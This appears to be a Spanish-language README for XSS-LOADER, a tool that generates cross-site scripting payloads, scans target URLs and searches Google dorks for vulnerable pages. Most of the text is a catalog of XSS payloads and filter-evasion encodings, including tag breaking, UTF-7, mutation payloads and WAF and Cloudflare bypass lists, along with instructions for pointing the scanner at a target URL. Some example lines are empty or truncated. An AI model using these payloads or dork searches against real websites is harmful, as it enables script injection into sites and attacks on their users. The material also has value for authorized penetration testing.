
Generador de Payloads Xss ~ Escáner Xss ~ Buscador de Dorks Xss

Herramienta integral para GENERADOR DE PAYLOADS XSS - ESCÁNER XSS - BUSCADOR DE DORKS XSS
Instagram: TMRSWRR

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
python3 payloader.py
Establece el parámetro predeterminado como:<script>alert(1)</script>
Establece el parámetro predeterminado como:<div onpointerover='alert(1)'>MUEVE AQUÍ</div
Establece el parámetro predeterminado como:``````
Establece el parámetro predeterminado como:<body ontouchstart=alert(1)>
Establece el parámetro predeterminado como:<svg onload=alert('1')>
Codifica el payload escrito por el usuario
Codifica el payload en la etiqueta seleccionada
* | 1. MAYÚSCULAS----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. MAYÚSCULAS Y MINÚSCULAS----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. CODIFICACIÓN URL -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. CODIFICACIÓN DE ENTIDAD HTML-----> <script>alert(1)</script>
* | 5. PAYLOAD DIVIDIDO -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. CODIFICACIÓN HEX -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. CODIFICACIÓN UTF-16 -----> Codifica el payload a formato utf-16.
* | 8. CODIFICACIÓN UTF-32-----> Codifica el payload a formato utf-32.
* | 9. ELIMINAR ETIQUETA -----> ";alert('XSS');//
* | 10. CODIFICACIÓN UNICODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. CODIFICACIÓN US-ASCII -----> ¼script¾alert(1)¼/script¾
* | 12. CODIFICACIÓN BASE64 -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. CODIFICACIÓN UTF-7 -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. OMISIÓN DE PARÉNTESIS -----> <script>alert`1`</script>
* | 15. CODIFICACIÓN UTF-8 -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. RUPTURA DE BLOQUE DE ETIQUETA-----> "><script>alert(1)</script>
* | 17. RUPTURA DE SCRIPT-----> </script><script>alert(1)</script>
* | 18. PAYLOAD DE CARGA DE ARCHIVO-----> "><script>alert(1)</script>.gif
* | 19. OMISIÓN DENTRO DE COMENTARIOS-----> <!--><script>alert(1)</script>-->
* | 20. PAYLOAD DE MUTACIÓN-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. IMG MALFORMADO-----> <script>alert(1)</script>">
* | 22. OMISIÓN DE ESPACIO----->
* | 23. BLOQUE OCULTO DOWNLEVEL-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. PAYLOADS DE OMISIÓN DE WAF-----> Mostrar lista de payloads de omisión de WAF
* | 25. PAYLOADS DE OMISIÓN DE CLOUDFLARE-----> Mostrar lista de payloads de omisión de Cloudflare
* | 26. PAYLOADS POLÍGLOTAS-----> Mostrar lista de payloads políglotas
* | 27. PAYLOADS DE ALERTA-----> Mostrar lista de payloads de alerta
* | 28. CREAR TODOS LOS PAYLOADS-----> Mostrar todos los payloads creados
* | 29. VOLVER AL MENÚ PRINCIPAL
* | 30. SALIR
Inicialmente deberás ingresar la URL del objetivo. Por favor, ingresa la URL como en este ejemplo ==> p.ej. objetivo -----> http://target.com/index.php?name= Seleccionado para escanear la lista de payloads
Los resultados se agregarán en "vulnpayload.txt" después del escaneo.
Primero ingresa el dork para buscar: p.ej---->inurl:"search.php?q=" Los resultados se guardarán en "dork.txt" después del escaneo.
Errores de Unicode
Errores de módulo
Importante:
Si deseas usar la herramienta para python3 instalado en Windows, descarga el siguiente enlace:
https://github.com/capture0x/XSS-LOADER-for-WINDOWS
Para reportes de errores o mejoras, por favor abre un issue aquí.
Copyright 2020